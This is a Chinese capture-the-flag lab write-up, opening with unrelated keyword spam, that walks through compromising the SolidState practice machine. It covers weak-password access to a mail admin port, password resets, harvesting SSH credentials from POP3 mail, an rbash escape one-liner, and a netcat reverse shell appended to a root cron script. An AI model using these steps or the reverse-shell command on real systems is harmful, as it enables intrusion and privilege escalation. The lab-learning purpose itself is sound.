北京网站备案更换主体,自己搭建一个博客网站,手机端网站ui做多少像素,免费企业网站系统源码下载声明#xff01; 学习资源来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下#xff0c;如涉及侵权马上删除文章#xff0c;笔记只是方便各位师傅的学习和探讨#xff0c;文章所提到的网站以及内容#xff0c;只做学习交流#xff0c;其他均与本人以及泷羽sec团队无关 学习资源来自B站up主 **泷羽sec** 有兴趣的师傅可以关注一下如涉及侵权马上删除文章笔记只是方便各位师傅的学习和探讨文章所提到的网站以及内容只做学习交流其他均与本人以及泷羽sec团队无关切勿触碰法律底线否则后果自负有兴趣的小伙伴可以点击下面连接进入b站主页[B站泷羽sec](https://space.bilibili.com/350329294) 有想要了解oscp认证证书的可以私信我哦泷羽sec新年特惠 Solidstate靶机wp
环境
攻击机kali ip地址192.168.66.141
靶机Solidstate ip地址192.168.66.135 安装好靶机后nmap扫描出靶机地址 使用-sS和-sV参数查看端口详细信息发现4555端口开启了可以利用远程执行命令的漏洞 使用dirb查看该网站存在的文件夹 到浏览器中查看一下该网站 好像都没什么特别有用的信息回到4555端口尝试使用nc和弱口令连接连接成功了 使用ls命令提示没有该命令使用help命令看看 发现有几个命令可能能利用一个是listusers列出用户另一个是setpassword重置密码 发现有五个用户尝试将他们的密码都重置成123 尝试连接ssh但是失败密码不对 这个端口好像没啥用了但是发现还有个110/pop3端口POP3服务器是遵循POP3协议的接受邮件服务器用于接收电子邮件
用刚刚的用户名和改了的密码登录登陆成功了 使用list命令查看文件和retr命令下载文件 RETR和STOR命令是FTP协议中的下载和上传命令, 可以针对文件和目录
第一个用户没有什么信息切换用户 第二个也没有再切 第三个用户爆出了一些信息记录下来 第四个用户也有些信息并且retr 2居然直接爆出了账号和密码 username: mindy pass: P55W0rd1!2 试着使用ssh连接连接成功了 ls出了一个user.txt文件cat试一下发现是一段密文
但是在想尝试切到其他文件夹时发现切换不了在报错的前缀里面看到rbash是受限制的shell 尝试使用一句话绕过
ssh mindy192.168.66.135 export TERMxterm; python -c import pty; pty.spawn(\/bin/sh\) 如果环境中存在python环境且没有被封禁export TERMxterm; python -c import pty; pty.spawn(\/bin/sh\)是通用的 可以正常使用了 在上面的信息中可以看到ssh的凭证来自于james用户 看一下james用户的进程运行情况发现多次出现一个opt的文件夹 切换到opt目录ls列一下文件列表有一个py文件是root权限可能可以利用 好像是要改什么东西 使用一句话追加到py文件使其能反弹shell到攻击机 echo os.system(/bin/nc -e /bin/bash 192.168.66.141 9999) tmp.py 执行文件反弹到攻击机提权成功 一开始是使用覆盖的写法写入python文件后面去查了一下加上群友的提醒发现原文件是root执行了一个定期任务隔一分钟执行一次该文件将其覆盖写入后原来的定时执行模块就被删除了导致我之前死活提权不成功 本次靶机主要是在多个端口中获取信息在4555端口修改邮箱用户的密码在110端口通过邮箱用户获取到ssh登陆密码然后通过python的一句话命令执行shell逃逸再通过计划任务的py文件进行提权
